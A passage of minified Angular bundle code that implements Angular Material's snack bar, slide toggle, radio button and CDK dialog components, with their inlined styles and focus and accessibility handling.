_openedSnackBarRef(e){this._parentSnackBar?this._parentSnackBar._openedSnackBarRef=e:this._snackBarRefAtThisLevel=e}openFromComponent(e,i){return this._attach(e,i)}openFromTemplate(e,i){return this._attach(e,i)}open(e,i="",n){const r=Object.assign(Object.assign({},this._defaultConfig),n);return r.data={message:e,action:i},r.announcementMessage===e&&(r.announcementMessage=void 0),this.openFromComponent(this.simpleSnackBarComponent,r)}dismiss(){this._openedSnackBarRef&&this._openedSnackBarRef.dismiss()}ngOnDestroy(){this._snackBarRefAtThisLevel&&this._snackBarRefAtThisLevel.dismiss()}_attachSnackBarContainer(e,i){const r=Ko.create({parent:i&&i.viewContainerRef&&i.viewContainerRef.injector||this._injector,providers:[{provide:nA,useValue:i}]}),c=new hp(this.snackBarContainerComponent,i.viewContainerRef,r),d=e.attach(c);return d.instance.snackBarConfig=i,d.instance}_attach(e,i){const n=Object.assign(Object.assign(Object.assign({},new nA),this._defaultConfig),i),r=this._createOverlay(n),c=this._attachSnackBarContainer(r,n),d=new f8(c,r);if(e instanceof ho){const T=new Mm(e,null,{$implicit:n.data,snackBarRef:d});d.instance=c.attachTemplatePortal(T)}else{const T=this._createInjector(n,d),k=new hp(e,void 0,T),q=c.attachComponentPortal(k);d.instance=q.instance}return this._breakpointObserver.observe("(max-width: 599.98px) and (orientation: portrait)").pipe(ea(r.detachments())).subscribe(T=>{r.overlayElement.classList.toggle(this.handsetCssClass,T.matches)}),n.announcementMessage&&c._onAnnounce.subscribe(()=>{this._live.announce(n.announcementMessage,n.politeness)}),this._animateSnackBar(d,n),this._openedSnackBarRef=d,this._openedSnackBarRef}_animateSnackBar(e,i){e.afterDismissed().subscribe(()=>{this._openedSnackBarRef==e&&(this._openedSnackBarRef=null),i.announcementMessage&&this._live.clear()}),this._openedSnackBarRef?(this._openedSnackBarRef.afterDismissed().subscribe(()=>{e.containerInstance.enter()}),this._openedSnackBarRef.dismiss()):e.containerInstance.enter(),i.duration&&i.duration>0&&e.afterOpened().subscribe(()=>e._dismissAfter(i.duration))}_createOverlay(e){const i=new yg;i.direction=e.direction;let n=this._overlay.position().global();const r="rtl"===e.direction,c="left"===e.horizontalPosition||"start"===e.horizontalPosition&&!r||"end"===e.horizontalPosition&&r,d=!c&&"center"!==e.horizontalPosition;return c?n.left("0"):d?n.right("0"):n.centerHorizontally(),"top"===e.verticalPosition?n.top("0"):n.bottom("0"),i.positionStrategy=n,this._overlay.create(i)}_createInjector(e,i){return Ko.create({parent:e&&e.viewContainerRef&&e.viewContainerRef.injector||this._injector,providers:[{provide:f8,useValue:i},{provide:eV,useValue:e.data}]})}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Nw),At(Ko),At(O3),At(t,12),At(tV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),I1e=(()=>{class t extends w1e{constructor(e,i,n,r,c,d){super(e,i,n,r,c,d),this.simpleSnackBarComponent=A1e,this.snackBarContainerComponent=D1e,this.handsetCssClass="mat-snack-bar-handset"}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Nw),At(Ko),At(O3),At(t,12),At(tV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:p8}),t})();const R1e=["input"],S1e=function(t){return{enterDuration:t}},k1e=["*"],P1e=new ni("mat-slide-toggle-default-options",{providedIn:"root",factory:()=>({disableToggleValue:!1})});let O1e=0;const N1e={provide:Ls,useExisting:ja(()=>Mg),multi:!0};class L1e{constructor(a,e){this.source=a,this.checked=e}}const z1e=dp(Pd(El(Zc(class{constructor(t){this._elementRef=t}}))));let W1e=(()=>{class t extends z1e{constructor(e,i,n,r,c,d,T){super(e),this._focusMonitor=i,this._changeDetectorRef=n,this.defaults=c,this._onChange=k=>{},this._onTouched=()=>{},this._required=!1,this._checked=!1,this.name=null,this.labelPosition="after",this.ariaLabel=null,this.ariaLabelledby=null,this.change=new Tt,this.toggleChange=new Tt,this.tabIndex=parseInt(r)||0,this.color=this.defaultColor=c.color||"accent",this._noopAnimations="NoopAnimations"===d,this.id=this._uniqueId=`${T}${++O1e}`}get required(){return this._required}set required(e){this._required=wi(e)}get checked(){return this._checked}set checked(e){this._checked=wi(e),this._changeDetectorRef.markForCheck()}get inputId(){return`${this.id||this._uniqueId}-input`}ngAfterContentInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{"keyboard"===e||"program"===e?this._focused=!0:e||Promise.resolve().then(()=>{this._focused=!1,this._onTouched(),this._changeDetectorRef.markForCheck()})})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}writeValue(e){this.checked=!!e}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetectorRef.markForCheck()}toggle(){this.checked=!this.checked,this._onChange(this.checked)}_emitChangeEvent(){this._onChange(this.checked),this.change.emit(this._createChangeEvent(this.checked))}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{name:"name",id:"id",labelPosition:"labelPosition",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],required:"required",checked:"checked"},outputs:{change:"change",toggleChange:"toggleChange"},features:[ci]}),t})(),Mg=(()=>{class t extends W1e{constructor(e,i,n,r,c,d){super(e,i,n,r,c,d,"mat-slide-toggle-")}_createChangeEvent(e){return new L1e(this,e)}_onChangeEvent(e){e.stopPropagation(),this.toggleChange.emit(),this.defaults.disableToggleValue?this._inputElement.nativeElement.checked=this.checked:(this.checked=this._inputElement.nativeElement.checked,this._emitChangeEvent())}_onInputClick(e){e.stopPropagation()}focus(e,i){i?this._focusMonitor.focusVia(this._inputElement,i,e):this._inputElement.nativeElement.focus(e)}_onLabelTextChange(){this._changeDetectorRef.detectChanges()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(Ma),Vr("tabindex"),Ee(P1e),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-slide-toggle"]],viewQuery:function(e,i){if(1&e&&Mi(R1e,5),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first)}},hostAttrs:[1,"mat-slide-toggle"],hostVars:13,hostBindings:function(e,i){2&e&&(Gs("id",i.id),Rt("tabindex",null)("aria-label",null)("aria-labelledby",null)("name",null),Ct("mat-checked",i.checked)("mat-disabled",i.disabled)("mat-slide-toggle-label-before","before"==i.labelPosition)("_mat-animation-noopable",i._noopAnimations))},inputs:{disabled:"disabled",disableRipple:"disableRipple",color:"color",tabIndex:"tabIndex"},exportAs:["matSlideToggle"],features:[ki([N1e]),ci],ngContentSelectors:k1e,decls:14,vars:20,consts:[[1,"mat-slide-toggle-label"],["label",""],[1,"mat-slide-toggle-bar"],["type","checkbox","role","switch",1,"mat-slide-toggle-input","cdk-visually-hidden",3,"id","required","tabIndex","checked","disabled","change","click"],["input",""],[1,"mat-slide-toggle-thumb-container"],[1,"mat-slide-toggle-thumb"],["mat-ripple","",1,"mat-slide-toggle-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleCentered","matRippleRadius","matRippleAnimation"],[1,"mat-ripple-element","mat-slide-toggle-persistent-ripple"],[1,"mat-slide-toggle-content",3,"cdkObserveContent"],["labelContent",""],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2)(3,"input",3,4),he("change",function(r){return i._onChangeEvent(r)})("click",function(r){return i._onInputClick(r)}),u(),m(5,"span",5),it(6,"span",6),m(7,"span",7),it(8,"span",8),u()()(),m(9,"span",9,10),he("cdkObserveContent",function(){return i._onLabelTextChange()}),m(11,"span",11),s(12,"\xa0"),u(),va(13),u()()),2&e){const n=Ti(1),r=Ti(10);Rt("for",i.inputId),C(2),Ct("mat-slide-toggle-bar-no-side-margin",!r.textContent||!r.textContent.trim()),C(1),V("id",i.inputId)("required",i.required)("tabIndex",i.tabIndex)("checked",i.checked)("disabled",i.disabled),Rt("name",i.name)("aria-checked",i.checked)("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby)("aria-describedby",i.ariaDescribedby),C(4),V("matRippleTrigger",n)("matRippleDisabled",i.disableRipple||i.disabled)("matRippleCentered",!0)("matRippleRadius",20)("matRippleAnimation",fr(18,S1e,i._noopAnimations?0:150))}},dependencies:[Dl,P3],styles:['.mat-slide-toggle{display:inline-block;height:24px;max-width:100%;line-height:24px;white-space:nowrap;outline:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-slide-toggle.mat-checked .mat-slide-toggle-thumb-container{transform:translate3d(16px, 0, 0)}[dir=rtl] .mat-slide-toggle.mat-checked .mat-slide-toggle-thumb-container{transform:translate3d(-16px, 0, 0)}.mat-slide-toggle.mat-disabled{opacity:.38}.mat-slide-toggle.mat-disabled .mat-slide-toggle-label,.mat-slide-toggle.mat-disabled .mat-slide-toggle-thumb-container{cursor:default}.mat-slide-toggle-label{-webkit-user-select:none;user-select:none;display:flex;flex:1;flex-direction:row;align-items:center;height:inherit;cursor:pointer}.mat-slide-toggle-content{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-slide-toggle-label-before .mat-slide-toggle-label{order:1}.mat-slide-toggle-label-before .mat-slide-toggle-bar{order:2}[dir=rtl] .mat-slide-toggle-label-before .mat-slide-toggle-bar,.mat-slide-toggle-bar{margin-right:8px;margin-left:0}[dir=rtl] .mat-slide-toggle-bar,.mat-slide-toggle-label-before .mat-slide-toggle-bar{margin-left:8px;margin-right:0}.mat-slide-toggle-bar-no-side-margin{margin-left:0;margin-right:0}.mat-slide-toggle-thumb-container{position:absolute;z-index:1;width:20px;height:20px;top:-3px;left:0;transform:translate3d(0, 0, 0);transition:all 80ms linear;transition-property:transform}._mat-animation-noopable .mat-slide-toggle-thumb-container{transition:none}[dir=rtl] .mat-slide-toggle-thumb-container{left:auto;right:0}.mat-slide-toggle-thumb{height:20px;width:20px;border-radius:50%;display:block}.mat-slide-toggle-bar{position:relative;width:36px;height:14px;flex-shrink:0;border-radius:8px}.mat-slide-toggle-input{bottom:0;left:10px}[dir=rtl] .mat-slide-toggle-input{left:auto;right:10px}.mat-slide-toggle-bar,.mat-slide-toggle-thumb{transition:all 80ms linear;transition-property:background-color;transition-delay:50ms}._mat-animation-noopable .mat-slide-toggle-bar,._mat-animation-noopable .mat-slide-toggle-thumb{transition:none}.mat-slide-toggle .mat-slide-toggle-ripple{position:absolute;top:calc(50% - 20px);left:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-slide-toggle .mat-slide-toggle-ripple .mat-ripple-element:not(.mat-slide-toggle-persistent-ripple){opacity:.12}.mat-slide-toggle-persistent-ripple{width:100%;height:100%;transform:none}.mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{opacity:.04}.mat-slide-toggle:not(.mat-disabled).cdk-keyboard-focused .mat-slide-toggle-persistent-ripple{opacity:.12}.mat-slide-toggle-persistent-ripple,.mat-slide-toggle.mat-disabled .mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{opacity:0}@media(hover: none){.mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{display:none}}.mat-slide-toggle-input:focus~.mat-slide-toggle-thumb-container .mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-slide-toggle-thumb,.cdk-high-contrast-active .mat-slide-toggle-bar{border:1px solid}'],encapsulation:2,changeDetection:0}),t})(),iV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),aV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[iV,Od,la,$y,iV,la]}),t})();const B1e=["input"],H1e=function(t){return{enterDuration:t}},U1e=["*"],q1e=new ni("mat-radio-default-options",{providedIn:"root",factory:function G1e(){return{color:"accent"}}});let nV=0;const j1e={provide:Ls,useExisting:ja(()=>sV),multi:!0};class oV{constructor(a,e){this.source=a,this.value=e}}const rV=new ni("MatRadioGroup");let Q1e=(()=>{class t{constructor(e){this._changeDetector=e,this._value=null,this._name="mat-radio-group-"+nV++,this._selected=null,this._isInitialized=!1,this._labelPosition="after",this._disabled=!1,this._required=!1,this._controlValueAccessorChangeFn=()=>{},this.onTouched=()=>{},this.change=new Tt}get name(){return this._name}set name(e){this._name=e,this._updateRadioButtonNames()}get labelPosition(){return this._labelPosition}set labelPosition(e){this._labelPosition="before"===e?"before":"after",this._markRadiosForCheck()}get value(){return this._value}set value(e){this._value!==e&&(this._value=e,this._updateSelectedRadioFromValue(),this._checkSelectedRadioButton())}_checkSelectedRadioButton(){this._selected&&!this._selected.checked&&(this._selected.checked=!0)}get selected(){return this._selected}set selected(e){this._selected=e,this.value=e?e.value:null,this._checkSelectedRadioButton()}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._markRadiosForCheck()}get required(){return this._required}set required(e){this._required=wi(e),this._markRadiosForCheck()}ngAfterContentInit(){this._isInitialized=!0}_touch(){this.onTouched&&this.onTouched()}_updateRadioButtonNames(){this._radios&&this._radios.forEach(e=>{e.name=this.name,e._markForCheck()})}_updateSelectedRadioFromValue(){this._radios&&(null===this._selected||this._selected.value!==this._value)&&(this._selected=null,this._radios.forEach(i=>{i.checked=this.value===i.value,i.checked&&(this._selected=i)}))}_emitChangeEvent(){this._isInitialized&&this.change.emit(new oV(this._selected,this._value))}_markRadiosForCheck(){this._radios&&this._radios.forEach(e=>e._markForCheck())}writeValue(e){this.value=e,this._changeDetector.markForCheck()}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this.onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetector.markForCheck()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275dir=Ot({type:t,inputs:{color:"color",name:"name",labelPosition:"labelPosition",value:"value",selected:"selected",disabled:"disabled",required:"required"},outputs:{change:"change"}}),t})(),sV=(()=>{class t extends Q1e{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-radio-group"]],contentQueries:function(e,i,n){if(1&e&&fa(n,cV,5),2&e){let r;Vt(r=Bt())&&(i._radios=r)}},hostAttrs:["role","radiogroup",1,"mat-radio-group"],exportAs:["matRadioGroup"],features:[ki([j1e,{provide:rV,useExisting:t}]),ci]}),t})();class $1e{constructor(a){this._elementRef=a}}const K1e=El(dp($1e));let X1e=(()=>{class t extends K1e{constructor(e,i,n,r,c,d,T,k){super(i),this._changeDetector=n,this._focusMonitor=r,this._radioDispatcher=c,this._providerOverride=T,this._uniqueId="mat-radio-"+ ++nV,this.id=this._uniqueId,this.change=new Tt,this._checked=!1,this._value=null,this._removeUniqueSelectionListener=()=>{},this.radioGroup=e,this._noopAnimations="NoopAnimations"===d,k&&(this.tabIndex=Uo(k,0)),this._removeUniqueSelectionListener=c.listen((q,Y)=>{q!==this.id&&Y===this.name&&(this.checked=!1)})}get checked(){return this._checked}set checked(e){const i=wi(e);this._checked!==i&&(this._checked=i,i&&this.radioGroup&&this.radioGroup.value!==this.value?this.radioGroup.selected=this:!i&&this.radioGroup&&this.radioGroup.value===this.value&&(this.radioGroup.selected=null),i&&this._radioDispatcher.notify(this.id,this.name),this._changeDetector.markForCheck())}get value(){return this._value}set value(e){this._value!==e&&(this._value=e,null!==this.radioGroup&&(this.checked||(this.checked=this.radioGroup.value===e),this.checked&&(this.radioGroup.selected=this)))}get labelPosition(){return this._labelPosition||this.radioGroup&&this.radioGroup.labelPosition||"after"}set labelPosition(e){this._labelPosition=e}get disabled(){return this._disabled||null!==this.radioGroup&&this.radioGroup.disabled}set disabled(e){this._setDisabled(wi(e))}get required(){return this._required||this.radioGroup&&this.radioGroup.required}set required(e){this._required=wi(e)}get color(){return this._color||this.radioGroup&&this.radioGroup.color||this._providerOverride&&this._providerOverride.color||"accent"}set color(e){this._color=e}get inputId(){return`${this.id||this._uniqueId}-input`}focus(e,i){i?this._focusMonitor.focusVia(this._inputElement,i,e):this._inputElement.nativeElement.focus(e)}_markForCheck(){this._changeDetector.markForCheck()}ngOnInit(){this.radioGroup&&(this.checked=this.radioGroup.value===this._value,this.checked&&(this.radioGroup.selected=this),this.name=this.radioGroup.name)}ngDoCheck(){this._updateTabIndex()}ngAfterViewInit(){this._updateTabIndex(),this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{!e&&this.radioGroup&&this.radioGroup._touch()})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._removeUniqueSelectionListener()}_emitChangeEvent(){this.change.emit(new oV(this,this._value))}_isRippleDisabled(){return this.disableRipple||this.disabled}_onInputClick(e){e.stopPropagation()}_onInputInteraction(e){if(e.stopPropagation(),!this.checked&&!this.disabled){const i=this.radioGroup&&this.value!==this.radioGroup.value;this.checked=!0,this._emitChangeEvent(),this.radioGroup&&(this.radioGroup._controlValueAccessorChangeFn(this.value),i&&this.radioGroup._emitChangeEvent())}}_setDisabled(e){this._disabled!==e&&(this._disabled=e,this._changeDetector.markForCheck())}_updateTabIndex(){var e;const i=this.radioGroup;let n;if(n=i&&i.selected&&!this.disabled?i.selected===this?this.tabIndex:-1:this.tabIndex,n!==this._previousTabIndex){const r=null===(e=this._inputElement)||void 0===e?void 0:e.nativeElement;r&&(r.setAttribute("tabindex",n+""),this._previousTabIndex=n)}}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&Mi(B1e,5),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first)}},inputs:{id:"id",name:"name",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],checked:"checked",value:"value",labelPosition:"labelPosition",disabled:"disabled",required:"required",color:"color"},outputs:{change:"change"},features:[ci]}),t})(),cV=(()=>{class t extends X1e{constructor(e,i,n,r,c,d,T,k){super(e,i,n,r,c,d,T,k)}}return t.\u0275fac=function(e){return new(e||t)(Ee(rV,8),Ee(mi),Ee(Ma),Ee(js),Ee(aw),Ee(ar,8),Ee(q1e,8),Vr("tabindex"))},t.\u0275cmp=Wt({type:t,selectors:[["mat-radio-button"]],hostAttrs:[1,"mat-radio-button"],hostVars:17,hostBindings:function(e,i){1&e&&he("focus",function(){return i._inputElement.nativeElement.focus()}),2&e&&(Rt("tabindex",null)("id",i.id)("aria-label",null)("aria-labelledby",null)("aria-describedby",null),Ct("mat-radio-checked",i.checked)("mat-radio-disabled",i.disabled)("_mat-animation-noopable",i._noopAnimations)("mat-primary","primary"===i.color)("mat-accent","accent"===i.color)("mat-warn","warn"===i.color))},inputs:{disableRipple:"disableRipple",tabIndex:"tabIndex"},exportAs:["matRadioButton"],features:[ci],ngContentSelectors:U1e,decls:13,vars:19,consts:[[1,"mat-radio-label"],["label",""],[1,"mat-radio-container"],[1,"mat-radio-outer-circle"],[1,"mat-radio-inner-circle"],["type","radio",1,"mat-radio-input",3,"id","checked","disabled","required","change","click"],["input",""],["mat-ripple","",1,"mat-radio-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleCentered","matRippleRadius","matRippleAnimation"],[1,"mat-ripple-element","mat-radio-persistent-ripple"],[1,"mat-radio-label-content"],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2),it(3,"span",3)(4,"span",4),m(5,"input",5,6),he("change",function(r){return i._onInputInteraction(r)})("click",function(r){return i._onInputClick(r)}),u(),m(7,"span",7),it(8,"span",8),u()(),m(9,"span",9)(10,"span",10),s(11,"\xa0"),u(),va(12),u()()),2&e){const n=Ti(1);Rt("for",i.inputId),C(5),V("id",i.inputId)("checked",i.checked)("disabled",i.disabled)("required",i.required),Rt("name",i.name)("value",i.value)("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby)("aria-describedby",i.ariaDescribedby),C(2),V("matRippleTrigger",n)("matRippleDisabled",i._isRippleDisabled())("matRippleCentered",!0)("matRippleRadius",20)("matRippleAnimation",fr(17,H1e,i._noopAnimations?0:150)),C(2),Ct("mat-radio-label-before","before"==i.labelPosition)}},dependencies:[Dl],styles:['.mat-radio-button{display:inline-block;-webkit-tap-highlight-color:rgba(0,0,0,0);outline:0}.mat-radio-label{-webkit-user-select:none;user-select:none;cursor:pointer;display:inline-flex;align-items:center;white-space:nowrap;vertical-align:middle;width:100%}.mat-radio-container{box-sizing:border-box;display:inline-block;position:relative;width:20px;height:20px;flex-shrink:0}.mat-radio-outer-circle{box-sizing:border-box;display:block;height:20px;left:0;position:absolute;top:0;transition:border-color ease 280ms;width:20px;border-width:2px;border-style:solid;border-radius:50%}._mat-animation-noopable .mat-radio-outer-circle{transition:none}.mat-radio-inner-circle{border-radius:50%;box-sizing:border-box;display:block;height:20px;left:0;position:absolute;top:0;opacity:0;transition:transform ease 280ms,background-color ease 280ms,opacity linear 1ms 280ms;width:20px;transform:scale(0.001);-webkit-print-color-adjust:exact;color-adjust:exact}.mat-radio-checked .mat-radio-inner-circle{transform:scale(0.5);opacity:1;transition:transform ease 280ms,background-color ease 280ms}.cdk-high-contrast-active .mat-radio-checked .mat-radio-inner-circle{border:solid 10px}._mat-animation-noopable .mat-radio-inner-circle{transition:none}.mat-radio-label-content{-webkit-user-select:auto;user-select:auto;display:inline-block;order:0;line-height:inherit;padding-left:8px;padding-right:0}[dir=rtl] .mat-radio-label-content{padding-right:8px;padding-left:0}.mat-radio-label-content.mat-radio-label-before{order:-1;padding-left:0;padding-right:8px}[dir=rtl] .mat-radio-label-content.mat-radio-label-before{padding-right:0;padding-left:8px}.mat-radio-disabled,.mat-radio-disabled .mat-radio-label{cursor:default}.mat-radio-button .mat-radio-ripple{position:absolute;left:calc(50% - 20px);top:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-radio-button .mat-radio-ripple .mat-ripple-element:not(.mat-radio-persistent-ripple){opacity:.16}.mat-radio-persistent-ripple{width:100%;height:100%;transform:none;top:0;left:0}.mat-radio-container:hover .mat-radio-persistent-ripple{opacity:.04}.mat-radio-button:not(.mat-radio-disabled).cdk-keyboard-focused .mat-radio-persistent-ripple,.mat-radio-button:not(.mat-radio-disabled).cdk-program-focused .mat-radio-persistent-ripple{opacity:.12}.mat-radio-persistent-ripple,.mat-radio-disabled .mat-radio-container:hover .mat-radio-persistent-ripple{opacity:0}@media(hover: none){.mat-radio-container:hover .mat-radio-persistent-ripple{display:none}}.mat-radio-input{opacity:0;position:absolute;top:0;left:0;margin:0;width:100%;height:100%;cursor:inherit;z-index:-1}.mat-radio-input:focus~.mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-radio-disabled{opacity:.5}'],encapsulation:2,changeDetection:0}),t})(),_8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,la,la]}),t})();function Y1e(t,a){}class oA{constructor(){this.role="dialog",this.panelClass="",this.hasBackdrop=!0,this.backdropClass="",this.disableClose=!1,this.width="",this.height="",this.data=null,this.ariaDescribedBy=null,this.ariaLabelledBy=null,this.ariaLabel=null,this.ariaModal=!0,this.autoFocus="first-tabbable",this.restoreFocus=!0,this.closeOnNavigation=!0,this.closeOnDestroy=!0}}let lV=(()=>{class t extends eA{constructor(e,i,n,r,c,d,T,k){super(),this._elementRef=e,this._focusTrapFactory=i,this._config=r,this._interactivityChecker=c,this._ngZone=d,this._overlayRef=T,this._focusMonitor=k,this._elementFocusedBeforeDialogWasOpened=null,this._closeInteractionType=null,this.attachDomPortal=q=>{this._portalOutlet.hasAttached();const Y=this._portalOutlet.attachDomPortal(q);return this._contentAttached(),Y},this._ariaLabelledBy=this._config.ariaLabelledBy||null,this._document=n}_contentAttached(){this._initializeFocusTrap(),this._handleBackdropClicks(),this._captureInitialFocus()}_captureInitialFocus(){this._trapFocus()}ngOnDestroy(){this._restoreFocus()}attachComponentPortal(e){this._portalOutlet.hasAttached();const i=this._portalOutlet.attachComponentPortal(e);return this._contentAttached(),i}attachTemplatePortal(e){this._portalOutlet.hasAttached();const i=this._portalOutlet.attachTemplatePortal(e);return this._contentAttached(),i}_recaptureFocus(){this._containsFocus()||this._trapFocus()}_forceFocus(e,i){this._interactivityChecker.isFocusable(e)||(e.tabIndex=-1,this._ngZone.runOutsideAngular(()=>{const n=()=>{e.removeEventListener("blur",n),e.removeEventListener("mousedown",n),e.removeAttribute("tabindex")};e.addEventListener("blur",n),e.addEventListener("mousedown",n)})),e.focus(i)}_focusByCssSelector(e,i){let n=this._elementRef.nativeElement.querySelector(e);n&&this._forceFocus(n,i)}_trapFocus(){const e=this._elementRef.nativeElement;switch(this._config.autoFocus){case!1:case"dialog":this._containsFocus()||e.focus();break;case!0:case"first-tabbable":this._focusTrap.focusInitialElementWhenReady().then(i=>{i||this._focusDialogContainer()});break;case"first-heading":this._focusByCssSelector('h1, h2, h3, h4, h5, h6, [role="heading"]');break;default:this._focusByCssSelector(this._config.autoFocus)}}_restoreFocus(){const e=this._config.restoreFocus;let i=null;if("string"==typeof e?i=this._document.querySelector(e):"boolean"==typeof e?i=e?this._elementFocusedBeforeDialogWasOpened:null:e&&(i=e),this._config.restoreFocus&&i&&"function"==typeof i.focus){const n=g3(),r=this._elementRef.nativeElement;(!n||n===this._document.body||n===r||r.contains(n))&&(this._focusMonitor?(this._focusMonitor.focusVia(i,this._closeInteractionType),this._closeInteractionType=null):i.focus())}this._focusTrap&&this._focusTrap.destroy()}_focusDialogContainer(){this._elementRef.nativeElement.focus&&this._elementRef.nativeElement.focus()}_containsFocus(){const e=this._elementRef.nativeElement,i=g3();return e===i||e.contains(i)}_initializeFocusTrap(){this._focusTrap=this._focusTrapFactory.create(this._elementRef.nativeElement),this._document&&(this._elementFocusedBeforeDialogWasOpened=g3())}_handleBackdropClicks(){this._overlayRef.backdropClick().subscribe(()=>{this._config.disableClose&&this._recaptureFocus()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(oA),Ee(Ky),Ee(qi),Ee(nb),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-dialog-container"]],viewQuery:function(e,i){if(1&e&&Mi(Cu,7),2&e){let n;Vt(n=Bt())&&(i._portalOutlet=n.first)}},hostAttrs:["tabindex","-1",1,"cdk-dialog-container"],hostVars:6,hostBindings:function(e,i){2&e&&Rt("id",i._config.id||null)("role",i._config.role)("aria-modal",i._config.ariaModal)("aria-labelledby",i._config.ariaLabel?null:i._ariaLabelledBy)("aria-label",i._config.ariaLabel)("aria-describedby",i._config.ariaDescribedBy||null)},features:[ci],decls:1,vars:0,consts:[["cdkPortalOutlet",""]],template:function(e,i){1&e&&ne(0,Y1e,0,0,"ng-template",0)},dependencies:[Cu],styles:[".cdk-dialog-container{display:block;width:100%;height:100%;min-height:inherit;max-height:inherit}"],encapsulation:2}),t})();class g8{constructor(a,e){this.overlayRef=a,this.config=e,this.closed=new J,this.disableClose=e.disableClose,this.backdropClick=a.backdropClick(),this.keydownEvents=a.keydownEvents(),this.outsidePointerEvents=a.outsidePointerEvents(),this.id=e.id,this.keydownEvents.subscribe(i=>{27===i.keyCode&&!this.disableClose&&!es(i)&&(i.preventDefault(),this.close(void 0,{focusOrigin:"keyboard"}))}),this.backdropClick.subscribe(()=>{this.disableClose||this.close(void 0,{focusOrigin:"mouse"})})}close(a,e){if(this.containerInstance){const i=this.closed;this.containerInstance._closeInteractionType=(null==e?void 0:e.focusOrigin)||"program",this.overlayRef.dispose(),i.next(a),i.complete(),this.componentInstance=this.containerInstance=null}}updatePosition(){return this.overlayRef.updatePosition(),this}updateSize(a="",e=""){return this.overlayRef.updateSize({width:a,height:e}),this}addPanelClass(a){return this.overlayRef.addPanelClass(a),this}removePanelClass(a){return this.overlayRef.removePanelClass(a),this}}const dV=new ni("DialogScrollStrategy"),J1e=new ni("DialogData"),Z1e=new ni("DefaultDialogConfig"),t2e={provide:dV,deps:[As],useFactory:function e2e(t){return()=>t.scrollStrategies.block()}};let i2e=0,mV=(()=>{class t{constructor(e,i,n,r,c,d){this._overlay=e,this._injector=i,this._defaultOptions=n,this._parentDialog=r,this._overlayContainer=c,this._openDialogsAtThisLevel=[],this._afterAllClosedAtThisLevel=new J,this._afterOpenedAtThisLevel=new J,this._ariaHiddenElements=new Map,this.afterAllClosed=rp(()=>this.openDialogs.length?this._getAfterAllClosed():this._getAfterAllClosed().pipe(Ro(void 0))),this._scrollStrategy=d}get openDialogs(){return this._parentDialog?this._parentDialog.openDialogs:this._openDialogsAtThisLevel}get afterOpened(){return this._parentDialog?this._parentDialog.afterOpened:this._afterOpenedAtThisLevel}open(e,i){const n=this._defaultOptions||new oA;(i=Object.assign(Object.assign({},n),i)).id=i.id||"cdk-dialog-"+i2e++,i.id&&this.getDialogById(i.id);const r=this._getOverlayConfig(i),c=this._overlay.create(r),d=new g8(c,i),T=this._attachContainer(c,d,i);return d.containerInstance=T,this._attachDialogContent(e,d,T,i),this.openDialogs.length||this._hideNonDialogContentFromAssistiveTechnology(),this.openDialogs.push(d),d.closed.subscribe(()=>this._removeOpenDialog(d,!0)),this.afterOpened.next(d),d}closeAll(){C8(this.openDialogs,e=>e.close())}getDialogById(e){return 